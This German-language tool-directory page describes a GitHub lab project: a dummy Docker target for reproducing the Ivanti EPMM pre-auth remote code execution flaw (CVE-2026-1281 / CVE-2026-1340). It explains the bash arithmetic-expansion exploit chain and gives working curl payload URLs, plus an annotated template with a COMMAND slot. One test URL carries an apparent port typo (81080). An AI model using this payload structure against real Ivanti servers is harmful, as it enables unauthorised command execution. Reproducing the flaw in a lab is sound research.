Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/yunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubyunfeige18/cve-2026-1281-cve-2026-1340-ivanti-epmm-rce

CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE

Eine einfache Demo-Anwendung, die zeigt, wie die Ivanti-EPMM-Pre-Auth-RCE-Schwachstelle (CVE-2026-1281 / CVE-2026-1340) zu Bildungs- und Sicherheitsforschungszwecken reproduziert werden kann.

Repository anzeigen
312vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Ivanti EPMM Pre-Auth RCE Dummy Target

Eine einfache Demo-Anwendung, die zeigt, wie die Ivanti EPMM Pre-Auth RCE-Schwachstelle (CVE-2026-1281 / CVE-2026-1340) zu Bildungs- und Sicherheitsforschungszwecken reproduziert werden kann.

Überblick über die Schwachstelle

Diese Schwachstelle nutzt das Verhalten der Bash-Arithmetik-Expansion aus. Wenn eine Variable, die einen Verweis auf eine andere Variable enthält, in einem arithmetischen Kontext verwendet wird und die referenzierte Variable einen Array-Index mit Befehlsersetzung enthält, wird der Befehl ausgeführt.

Die Exploit-Kette

  1. Die Anfrage enthält st=theValue (wörtliche Zeichenkette "theValue" mit Auffüllung)
  2. Die Anfrage enthält h=gPath[\command`]` (Befehl im Array-Index)
  3. Das Bash-Skript parst Schlüssel=Wert-Paare in einer Schleife und aktualisiert theValue bei jeder Iteration
  4. gStartTime wird auf die wörtliche Zeichenkette "theValue" gesetzt
  5. Nach der Schleife enthält theValue gPath[\command`]`
  6. Wenn [[ ${currentTime} -gt ${gStartTime} ]] ausgewertet wird:
    • ${gStartTime} → "theValue" (Zeichenkette)
    • Der arithmetische Kontext behandelt theValue als Variablenreferenz
    • theValue → gPath[\command`]`
    • Der Array-Index löst die Befehlsersetzung aus → RCE!

Schnellstart

# Container bauen und starten
docker-compose up --build -d

# Prüfen, ob er läuft
curl http://localhost:8180/health

Testen der Schwachstelle

1. Dateierstellungstest

Erstellen Sie eine Datei, um die Befehlsausführung zu beweisen:

# URL-kodiertes Payload: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"

# Prüfen, ob die Datei erstellt wurde
cat artifacts/poc

2. Zeitbasierter Test

Mit einem Sleep-Befehl verifizieren:

# Sollte ~5 Sekunden für die Antwort benötigen
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"

3. Ausführung eines benutzerdefinierten Befehls

# Benutzerdefinierten Inhalt schreiben
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60echo%20PWNED%20%3E%20/mi/pwned%60%5D/test.ipa"

cat artifacts/pwned

URL-Struktur

/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60COMMAND%60%5D/uuid.ipa
                               │      │              │              │
                               │      │              │              └─ Payload: gPath[`COMMAND`]
                               │      │              └─ End-Zeitstempel (beliebige 10 Ziffern)
                               │      └─ KRITISCH: wörtlich "theValue" + 2 Leerzeichen (insgesamt 10 Zeichen)
                               └─ Schlüsselindex (beliebiger Wert)

Debugging

# Container-Logs anzeigen
docker-compose logs -f

# Eine Shell im Container öffnen
docker exec -it ivanti-epmm-vuln /bin/bash

# Nginx-Fehlerprotokolle prüfen
docker exec -it ivanti-epmm-vuln cat /var/log/nginx/error.log

Bereinigung

docker-compose down
rm -rf artifacts/*

Referenzen

  • WatchTowr Labs Blog-Beitrag

Haftungsausschluss

Dies dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Verwenden Sie es nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.

Tool herunterladen